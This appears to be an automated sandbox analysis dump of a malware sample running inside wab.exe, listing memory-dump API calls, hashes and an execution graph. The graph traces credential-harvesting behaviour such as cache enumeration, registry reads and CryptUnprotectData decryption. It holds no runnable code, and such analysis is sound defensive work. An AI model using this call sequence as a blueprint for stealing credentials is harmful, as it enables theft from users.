                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 939af0ebba06146ab35abdd998e5f0097158f993ac897d9b93b57c3eecf682f6
                                                              • Instruction ID: 05925518617817da1523e0373655500622d5c8f921d5ae529deaa02f5bb5b248
                                                              • Opcode Fuzzy Hash: 939af0ebba06146ab35abdd998e5f0097158f993ac897d9b93b57c3eecf682f6
                                                              • Instruction Fuzzy Hash: A301F47B114701ABD61336345C88F2B2A7F9BE197072401EDF819A6182FE28D912C137
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,23D710DF,?,?,?,00000000), ref: 23D71E9A
                                                              • lstrcatW.KERNEL32(?,?), ref: 23D71EAC
                                                              • lstrlenW.KERNEL32(?,?,23D710DF,?,?,?,00000000), ref: 23D71EB3
                                                              • lstrlenW.KERNEL32(?,?,23D710DF,?,?,?,00000000), ref: 23D71EC8
                                                              • lstrcatW.KERNEL32(?,23D710DF), ref: 23D71ED3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 493641738-0
                                                              • Opcode ID: e694e33add18df97b392ccb762c3051bc224ff524627b6611af4f75d10c295ff
                                                              • Instruction ID: c0103af6d1335e02beb27381188f1a96956cd131af2dd7f1f52e503be5e26075
                                                              • Opcode Fuzzy Hash: e694e33add18df97b392ccb762c3051bc224ff524627b6611af4f75d10c295ff
                                                              • Instruction Fuzzy Hash: E2F082271102107AE621372AAC85EBF7B7CFFD6A60B44001EFA0893190AB59585292B9
                                                              APIs
                                                              • _free.LIBCMT ref: 23D791D0
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D791E2
                                                              • _free.LIBCMT ref: 23D791F4
                                                              • _free.LIBCMT ref: 23D79206
                                                              • _free.LIBCMT ref: 23D79218
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 380ba6b6585a89ad88c4c5e70eeee93ac3b735c43f7f2c04dea76ec7f554538f
                                                              • Instruction ID: bf991f6e8281804139bf93dd33e3230e81f5a8334cc66c45937beb4a0ad101e2
                                                              • Opcode Fuzzy Hash: 380ba6b6585a89ad88c4c5e70eeee93ac3b735c43f7f2c04dea76ec7f554538f
                                                              • Instruction Fuzzy Hash: 0BF01D73525640AB8664FB58EAC5D5A7BFAEB64B207A4088DF909D7500CB34F8808A68
                                                              APIs
                                                              • _free.LIBCMT ref: 23D7536F
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D75381
                                                              • _free.LIBCMT ref: 23D75394
                                                              • _free.LIBCMT ref: 23D753A5
                                                              • _free.LIBCMT ref: 23D753B6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: afd0413743019f5ad1e29aee5c3a2973e2cd963cb5c2ae4c7f25aa302791757b
                                                              • Instruction ID: 962599aa95c7238f86001512bdd594250d1e3ce96c1f1ac1a1465deef3109d65
                                                              • Opcode Fuzzy Hash: afd0413743019f5ad1e29aee5c3a2973e2cd963cb5c2ae4c7f25aa302791757b
                                                              • Instruction Fuzzy Hash: 88F0FEBAD35225DBC7127F2599805483BB6FB78B20306058EF81897264DB39B943DBD2
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 23D74C1D
                                                              • _free.LIBCMT ref: 23D74CE8
                                                              • _free.LIBCMT ref: 23D74CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                                              • API String ID: 2506810119-3377118234
                                                              • Opcode ID: 48fbfd310e10610c140197ebb5b64989aa160199a6be19bc127ffce53ebc5405
                                                              • Instruction ID: 14248b45365929347ad720a22c1d12f5615f42d234f3a62e2072ef2b75c30be8
                                                              • Opcode Fuzzy Hash: 48fbfd310e10610c140197ebb5b64989aa160199a6be19bc127ffce53ebc5405
                                                              • Instruction Fuzzy Hash: D1312F75F00358AFDB22DB998980D9EBBFCEB95710B1440DEF90497210E675AA41CBA1
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,23D76FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 23D78731
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 23D787BA
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 23D787CC
                                                              • __freea.LIBCMT ref: 23D787D5
                                                                • Part of subcall function 23D756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23D75702
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 83bf9734d33f3b344e730902b2f18fb9f3722949a0d975ee00af5898744963cd
                                                              • Instruction ID: 5fa2d0269db807cf448656219ea1b32f84029c5f2414f017718dbebe2b0d4ce8
                                                              • Opcode Fuzzy Hash: 83bf9734d33f3b344e730902b2f18fb9f3722949a0d975ee00af5898744963cd
                                                              • Instruction Fuzzy Hash: 5631BE32A0022AABDF249F64CC82EFF7BB5EB50610F0401ACED05DB190E735D955CBA0
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(23D7C7DD), ref: 23D7C7E6
                                                              • GetModuleHandleA.KERNEL32(?,23D7C7DD), ref: 23D7C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 23D7C860
                                                                • Part of subcall function 23D7C803: GetProcAddress.KERNEL32(00000000,23D7C7F4), ref: 23D7C804
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 1646373207-0
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,23D71D66,00000000,00000000,?,23D75C88,23D71D66,00000000,00000000,00000000,?,23D75E85,00000006,FlsSetValue), ref: 23D75D13
                                                              • GetLastError.KERNEL32(?,23D75C88,23D71D66,00000000,00000000,00000000,?,23D75E85,00000006,FlsSetValue,23D7E190,FlsSetValue,00000000,00000364,?,23D75BC8), ref: 23D75D1F
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,23D75C88,23D71D66,00000000,00000000,00000000,?,23D75E85,00000006,FlsSetValue,23D7E190,FlsSetValue,00000000), ref: 23D75D2D
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: : $Se.
                                                              • API String ID: 4218353326-4089948878
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 23D72903
                                                                • Part of subcall function 23D735D2: RaiseException.KERNEL32(?,?,?,23D72925,00000000,00000000,00000000,?,?,?,?,?,23D72925,?,23D821B8), ref: 23D73632
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 23D72920
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341

                                                              Execution Graph

                                                              Execution Coverage: 6.2%
                                                              Dynamic/Decrypted Code Coverage: 9.2%
                                                              Signature Coverage: 2.3%
                                                              Total number of Nodes: 2000
                                                              Total number of Limit Nodes: 77
4453c4 38650->38656 38651 40ae51 9 API calls 38651->38656 38652 4453f3 38653 40aebe FindClose 38652->38653 38655 4453fe 38653->38655 38654 40add4 2 API calls 38654->38656 38655->38345 38656->38651 38656->38652 38656->38654 38657 445403 254 API calls 38656->38657 38657->38656 38659 40ae7b FindNextFileW 38658->38659 38660 40ae5c FindFirstFileW 38658->38660 38661 40ae94 38659->38661 38662 40ae8f 38659->38662 38660->38661 38664 40aeb6 38661->38664 38665 409d1f 6 API calls 38661->38665 38663 40aebe FindClose 38662->38663 38663->38661 38664->38345 38665->38664 38666->38214 38667->38302 38668->38286 38669->38286 38670->38316 38672 409c89 38671->38672 38672->38341 38673->38370 38675 413d39 38674->38675 38676 413d2f FreeLibrary 38674->38676 38677 40b633 ??3@YAXPAX 38675->38677 38676->38675 38678 413d42 38677->38678 38679 40b633 ??3@YAXPAX 38678->38679 38680 413d4a 38679->38680 38680->38333 38681->38200 38682->38201 38683->38271 38685 44db70 38684->38685 38686 40b6fc memset 38685->38686 38687 409c70 2 API calls 38686->38687 38688 40b732 wcsrchr 38687->38688 38689 40b743 38688->38689 38690 40b746 memset 38688->38690 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 40b76f 38691->38692 38693 409d1f 6 API calls 38692->38693 38694 40b783 38693->38694 39515 409b98 GetFileAttributesW 38694->39515 38696 40b792 38697 409c70 2 API calls 38696->38697 38711 40b7c2 38696->38711 38699 40b7a5 38697->38699 38701 40b2cc 27 API calls 38699->38701 38705 40b7b2 38701->38705 38702 40b837 FindCloseChangeNotification 38704 40b83e memset 38702->38704 38703 40b817 39550 409a45 GetTempPathW 38703->39550 39549 40a6e6 WideCharToMultiByte 38704->39549 38708 409d1f 6 API calls 38705->38708 38708->38711 38709 40b827 CopyFileW 38709->38704 38710 40b866 38712 444432 121 API calls 38710->38712 39516 40bb98 38711->39516 38713 40b879 38712->38713 38714 40bad5 38713->38714 38715 40b273 27 API calls 38713->38715 38716 40baeb 38714->38716 38717 40bade DeleteFileW 38714->38717 38718 40b89a 38715->38718 
38719 40b04b ??3@YAXPAX 38716->38719 38717->38716 38720 438552 134 API calls 38718->38720 38721 40baf3 38719->38721 38722 40b8a4 38720->38722 38721->38203 38723 40bacd 38722->38723 38725 4251c4 137 API calls 38722->38725 38724 443d90 111 API calls 38723->38724 38724->38714 38748 40b8b8 38725->38748 38726 40bac6 39562 424f26 123 API calls 38726->39562 38727 40b8bd memset 39553 425413 17 API calls 38727->39553 38730 425413 17 API calls 38730->38748 38733 40a71b MultiByteToWideChar 38733->38748 38734 40a734 MultiByteToWideChar 38734->38748 38737 40b9b5 memcmp 38737->38748 38738 4099c6 2 API calls 38738->38748 38739 404423 38 API calls 38739->38748 38742 40bb3e memset memcpy 39563 40a734 MultiByteToWideChar 38742->39563 38743 4251c4 137 API calls 38743->38748 38745 40bb88 LocalFree 38745->38748 38748->38726 38748->38727 38748->38730 38748->38733 38748->38734 38748->38737 38748->38738 38748->38739 38748->38742 38748->38743 38749 40ba5f memcmp 38748->38749 39554 4253ef 16 API calls 38748->39554 39555 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38748->39555 39556 4253af 17 API calls 38748->39556 39557 4253cf 17 API calls 38748->39557 39558 447280 memset 38748->39558 39559 447960 memset memcpy memcpy memcpy 38748->39559 39560 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38748->39560 39561 447920 memcpy memcpy memcpy 38748->39561 38749->38748 38750->38282 38752 40aed1 38751->38752 38753 40aec7 FindClose 38751->38753 38752->38211 38753->38752 38755 4099d7 38754->38755 38756 4099da memcpy 38754->38756 38755->38756 38756->38258 38758 40b2cc 27 API calls 38757->38758 38759 44543f 38758->38759 38760 409d1f 6 API calls 38759->38760 38761 44544f 38760->38761 39655 409b98 GetFileAttributesW 38761->39655 38763 445476 38766 40b2cc 27 API calls 38763->38766 38764 44545e 38764->38763 38765 40b6ef 253 API calls 38764->38765 38765->38763 38767 445482 38766->38767 38768 409d1f 6 API calls 38767->38768 38769 445492 38768->38769 39656 409b98 GetFileAttributesW 38769->39656 38771 4454a1 38772 
4454b9 38771->38772 38773 40b6ef 253 API calls 38771->38773 38772->38284 38773->38772 38774->38283 38775->38307 38776->38313 38777->38348 38778->38329 38779->38373 38780->38373 38781->38359 38782->38389 38783->38391 38784->38393 38786 414c2e 16 API calls 38785->38786 38787 40c2ae 38786->38787 38857 40c1d3 38787->38857 38792 40c3be 38809 40a8ab 38792->38809 38793 40afcf 2 API calls 38794 40c2fd FindFirstUrlCacheEntryW 38793->38794 38795 40c3b6 38794->38795 38796 40c31e wcschr 38794->38796 38797 40b04b ??3@YAXPAX 38795->38797 38798 40c331 38796->38798 38799 40c35e FindNextUrlCacheEntryW 38796->38799 38797->38792 38800 40a8ab 9 API calls 38798->38800 38799->38796 38801 40c373 GetLastError 38799->38801 38804 40c33e wcschr 38800->38804 38802 40c3ad FindCloseUrlCache 38801->38802 38803 40c37e 38801->38803 38802->38795 38805 40afcf 2 API calls 38803->38805 38804->38799 38806 40c34f 38804->38806 38807 40c391 FindNextUrlCacheEntryW 38805->38807 38808 40a8ab 9 API calls 38806->38808 38807->38796 38807->38802 38808->38799 38951 40a97a 38809->38951 38812 40a8cc 38812->38400 38813 40a8d0 7 API calls 38813->38812 38956 40b1ab ??3@YAXPAX ??3@YAXPAX 38814->38956 38816 40c3dd 38817 40b2cc 27 API calls 38816->38817 38818 40c3e7 38817->38818 38957 414592 RegOpenKeyExW 38818->38957 38820 40c3f4 38821 40c50e 38820->38821 38822 40c3ff 38820->38822 38836 405337 38821->38836 38823 40a9ce 4 API calls 38822->38823 38824 40c418 memset 38823->38824 38958 40aa1d 38824->38958 38827 40c471 38829 40c47a _wcsupr 38827->38829 38828 40c505 RegCloseKey 38828->38821 38830 40a8d0 7 API calls 38829->38830 38831 40c498 38830->38831 38832 40a8d0 7 API calls 38831->38832 38833 40c4ac memset 38832->38833 38834 40aa1d 38833->38834 38835 40c4e4 RegEnumValueW 38834->38835 38835->38828 38835->38829 38960 405220 38836->38960 38840 4099c6 2 API calls 38839->38840 38841 40a714 _wcslwr 38840->38841 38842 40c634 38841->38842 39017 405361 38842->39017 38845 40c65c wcslen 39020 4053b6 39 API calls 38845->39020 38846 
40c71d wcslen 38846->38414 38848 40c677 38849 40c713 38848->38849 39021 40538b 39 API calls 38848->39021 39023 4053df 39 API calls 38849->39023 38852 40c6a5 38852->38849 38853 40c6a9 memset 38852->38853 38854 40c6d3 38853->38854 39022 40c589 44 API calls 38854->39022 38856->38407 38858 40ae18 9 API calls 38857->38858 38864 40c210 38858->38864 38859 40ae51 9 API calls 38859->38864 38860 40c264 38861 40aebe FindClose 38860->38861 38863 40c26f 38861->38863 38862 40add4 2 API calls 38862->38864 38869 40e5ed memset memset 38863->38869 38864->38859 38864->38860 38864->38862 38865 40c231 _wcsicmp 38864->38865 38866 40c1d3 35 API calls 38864->38866 38865->38864 38867 40c248 38865->38867 38866->38864 38882 40c084 22 API calls 38867->38882 38870 414c2e 16 API calls 38869->38870 38871 40e63f 38870->38871 38872 409d1f 6 API calls 38871->38872 38873 40e658 38872->38873 38883 409b98 GetFileAttributesW 38873->38883 38875 40e667 38876 40e680 38875->38876 38877 409d1f 6 API calls 38875->38877 38884 409b98 GetFileAttributesW 38876->38884 38877->38876 38879 40e68f 38881 40c2d8 38879->38881 38885 40e4b2 38879->38885 38881->38792 38881->38793 38882->38864 38883->38875 38884->38879 38906 40e01e 38885->38906 38887 40e521 38888 40e593 38887->38888 38929 40e175 38887->38929 38889 40e5b0 38888->38889 38890 40e59c DeleteFileW 38888->38890 38891 40b04b ??3@YAXPAX 38889->38891 38890->38889 38893 40e5bb 38891->38893 38894 40e5c4 CloseHandle 38893->38894 38895 40e5cc 38893->38895 38894->38895 38897 40b633 ??3@YAXPAX 38895->38897 38896 40e573 38899 40e584 38896->38899 38900 40e57c FindCloseChangeNotification 38896->38900 38898 40e5db 38897->38898 38902 40b633 ??3@YAXPAX 38898->38902 38950 40b1ab ??3@YAXPAX ??3@YAXPAX 38899->38950 38900->38899 38901 40e540 38901->38896 38949 40e2ab 30 API calls 38901->38949 38904 40e5e3 38902->38904 38904->38881 38907 406214 22 API calls 38906->38907 38908 40e03c 38907->38908 38909 40e16b 38908->38909 38910 40dd85 74 API calls 38908->38910 38909->38887 38911 
40e06b 38910->38911 38911->38909 38912 40afcf ??2@YAPAXI ??3@YAXPAX 38911->38912 38913 40e08d OpenProcess 38912->38913 38914 40e0a4 GetCurrentProcess DuplicateHandle 38913->38914 38918 40e152 38913->38918 38915 40e0d0 GetFileSize 38914->38915 38916 40e14a CloseHandle 38914->38916 38919 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38915->38919 38916->38918 38917 40e160 38921 40b04b ??3@YAXPAX 38917->38921 38918->38917 38920 406214 22 API calls 38918->38920 38922 40e0ea 38919->38922 38920->38917 38921->38909 38923 4096dc CreateFileW 38922->38923 38924 40e0f1 CreateFileMappingW 38923->38924 38925 40e140 CloseHandle CloseHandle 38924->38925 38926 40e10b MapViewOfFile 38924->38926 38925->38916 38927 40e13b FindCloseChangeNotification 38926->38927 38928 40e11f WriteFile UnmapViewOfFile 38926->38928 38927->38925 38928->38927 38930 40e18c 38929->38930 38931 406b90 11 API calls 38930->38931 38932 40e19f 38931->38932 38933 40e1a7 memset 38932->38933 38934 40e299 38932->38934 38939 40e1e8 38933->38939 38935 4069a3 ??3@YAXPAX ??3@YAXPAX 38934->38935 38936 40e2a4 38935->38936 38936->38901 38937 406e8f 13 API calls 38937->38939 38938 406b53 SetFilePointerEx ReadFile 38938->38939 38939->38937 38939->38938 38940 40e283 38939->38940 38941 40dd50 _wcsicmp 38939->38941 38945 40742e 8 API calls 38939->38945 38946 40aae3 wcslen wcslen _memicmp 38939->38946 38947 40e244 _snwprintf 38939->38947 38942 40e291 38940->38942 38943 40e288 ??3@YAXPAX 38940->38943 38941->38939 38944 40aa04 ??3@YAXPAX 38942->38944 38943->38942 38944->38934 38945->38939 38946->38939 38948 40a8d0 7 API calls 38947->38948 38948->38939 38949->38901 38950->38888 38953 40a980 38951->38953 38952 40a8bb 38952->38812 38952->38813 38953->38952 38954 40a995 _wcsicmp 38953->38954 38955 40a99c wcscmp 38953->38955 38954->38953 38955->38953 38956->38816 38957->38820 38959 40aa23 RegEnumValueW 38958->38959 38959->38827 38959->38828 38961 405335 38960->38961 38962 40522a 38960->38962 38961->38414 38963 40b2cc 27 API 
calls 38962->38963 38964 405234 38963->38964 38965 40a804 8 API calls 38964->38965 38966 40523a 38965->38966 39005 40b273 38966->39005 38968 405248 _mbscpy _mbscat GetProcAddress 38969 40b273 27 API calls 38968->38969 38970 405279 38969->38970 39008 405211 GetProcAddress 38970->39008 38972 405282 38973 40b273 27 API calls 38972->38973 38974 40528f 38973->38974 39009 405211 GetProcAddress 38974->39009 38976 405298 38977 40b273 27 API calls 38976->38977 38978 4052a5 38977->38978 39010 405211 GetProcAddress 38978->39010 38980 4052ae 38981 40b273 27 API calls 38980->38981 38982 4052bb 38981->38982 39011 405211 GetProcAddress 38982->39011 38984 4052c4 38985 40b273 27 API calls 38984->38985 38986 4052d1 38985->38986 39012 405211 GetProcAddress 38986->39012 38988 4052da 38989 40b273 27 API calls 38988->38989 38990 4052e7 38989->38990 39013 405211 GetProcAddress 38990->39013 38992 4052f0 38993 40b273 27 API calls 38992->38993 38994 4052fd 38993->38994 39014 405211 GetProcAddress 38994->39014 38996 405306 38997 40b273 27 API calls 38996->38997 38998 405313 38997->38998 39015 405211 GetProcAddress 38998->39015 39000 40531c 39001 40b273 27 API calls 39000->39001 39002 405329 39001->39002 39016 405211 GetProcAddress 39002->39016 39004 405332 39004->38961 39006 40b58d 27 API calls 39005->39006 39007 40b18c 39006->39007 39007->38968 39008->38972 39009->38976 39010->38980 39011->38984 39012->38988 39013->38992 39014->38996 39015->39000 39016->39004 39018 405220 39 API calls 39017->39018 39019 405369 39018->39019 39019->38845 39019->38846 39020->38848 39021->38852 39022->38849 39023->38846 39025 40440c FreeLibrary 39024->39025 39026 40436d 39025->39026 39027 40a804 8 API calls 39026->39027 39028 404377 39027->39028 39029 404383 39028->39029 39030 404405 39028->39030 39031 40b273 27 API calls 39029->39031 39030->38419 39030->38421 39030->38422 39032 40438d GetProcAddress 39031->39032 39033 40b273 27 API calls 39032->39033 39034 4043a7 GetProcAddress 39033->39034 39035 40b273 27 API 
calls 39034->39035 39036 4043ba GetProcAddress 39035->39036 39037 40b273 27 API calls 39036->39037 39038 4043ce GetProcAddress 39037->39038 39039 40b273 27 API calls 39038->39039 39040 4043e2 GetProcAddress 39039->39040 39041 4043f1 39040->39041 39042 4043f7 39041->39042 39043 40440c FreeLibrary 39041->39043 39042->39030 39043->39030 39045 404413 FreeLibrary 39044->39045 39046 40441e 39044->39046 39045->39046 39046->38436 39047->38432 39049 40447e 39048->39049 39050 40442e 39048->39050 39051 404485 CryptUnprotectData 39049->39051 39053 40449c 39049->39053 39052 40b2cc 27 API calls 39050->39052 39051->39053 39054 404438 39052->39054 39053->38432 39055 40a804 8 API calls 39054->39055 39056 40443e 39055->39056 39057 404445 39056->39057 39058 404467 39056->39058 39059 40b273 27 API calls 39057->39059 39058->39049 39061 404475 FreeLibrary 39058->39061 39060 40444f GetProcAddress 39059->39060 39060->39058 39062 404460 39060->39062 39061->39049 39062->39058 39064 4135f6 39063->39064 39065 4135eb FreeLibrary 39063->39065 39064->38439 39065->39064 39067 4449c4 39066->39067 39068 444a52 39066->39068 39069 40b2cc 27 API calls 39067->39069 39068->38456 39068->38461 39070 4449cb 39069->39070 39071 40a804 8 API calls 39070->39071 39072 4449d1 39071->39072 39073 40b273 27 API calls 39072->39073 39074 4449dc GetProcAddress 39073->39074 39075 40b273 27 API calls 39074->39075 39076 4449f3 GetProcAddress 39075->39076 39077 40b273 27 API calls 39076->39077 39078 444a04 GetProcAddress 39077->39078 39079 40b273 27 API calls 39078->39079 39080 444a15 GetProcAddress 39079->39080 39081 40b273 27 API calls 39080->39081 39082 444a26 GetProcAddress 39081->39082 39083 40b273 27 API calls 39082->39083 39084 444a37 GetProcAddress 39083->39084 39085 40b273 27 API calls 39084->39085 39086 444a48 GetProcAddress 39085->39086 39086->39068 39087->38467 39088->38467 39089->38467 39090->38467 39091->38457 39093 403a29 39092->39093 39107 403bed memset memset 39093->39107 39095 403a2f 39096 403ae7 
39095->39096 39097 403a3f memset 39095->39097 39100 409d1f 6 API calls 39095->39100 39101 409b98 GetFileAttributesW 39095->39101 39102 40a8d0 7 API calls 39095->39102 39120 40b1ab ??3@YAXPAX ??3@YAXPAX 39096->39120 39097->39095 39099 403aef 39099->38476 39100->39095 39101->39095 39102->39095 39104 40a051 GetFileTime FindCloseChangeNotification 39103->39104 39105 4039ca CompareFileTime 39103->39105 39104->39105 39105->38476 39106->38473 39108 414c2e 16 API calls 39107->39108 39109 403c38 39108->39109 39110 409719 2 API calls 39109->39110 39111 403c3f wcscat 39110->39111 39112 414c2e 16 API calls 39111->39112 39113 403c61 39112->39113 39114 409719 2 API calls 39113->39114 39115 403c68 wcscat 39114->39115 39121 403af5 39115->39121 39118 403af5 20 API calls 39119 403c95 39118->39119 39119->39095 39120->39099 39122 403b02 39121->39122 39123 40ae18 9 API calls 39122->39123 39125 403b37 39123->39125 39124 40ae51 9 API calls 39124->39125 39125->39124 39126 403bdb 39125->39126 39127 40add4 wcscmp wcscmp 39125->39127 39130 40ae18 9 API calls 39125->39130 39131 40aebe FindClose 39125->39131 39132 40a8d0 7 API calls 39125->39132 39128 40aebe FindClose 39126->39128 39127->39125 39129 403be6 39128->39129 39129->39118 39130->39125 39131->39125 39132->39125 39134 409d1f 6 API calls 39133->39134 39135 404190 39134->39135 39148 409b98 GetFileAttributesW 39135->39148 39137 40419c 39138 4041a7 6 API calls 39137->39138 39139 40435c 39137->39139 39141 40424f 39138->39141 39139->38501 39141->39139 39142 40425e memset 39141->39142 39144 409d1f 6 API calls 39141->39144 39145 40a8ab 9 API calls 39141->39145 39149 414842 39141->39149 39142->39141 39143 404296 wcscpy 39142->39143 39143->39141 39144->39141 39146 4042b6 memset memset _snwprintf wcscpy 39145->39146 39146->39141 39147->38499 39148->39137 39152 41443e 39149->39152 39151 414866 39151->39141 39153 41444b 39152->39153 39154 414451 39153->39154 39155 4144a3 GetPrivateProfileStringW 39153->39155 39156 414491 39154->39156 39157 414455 
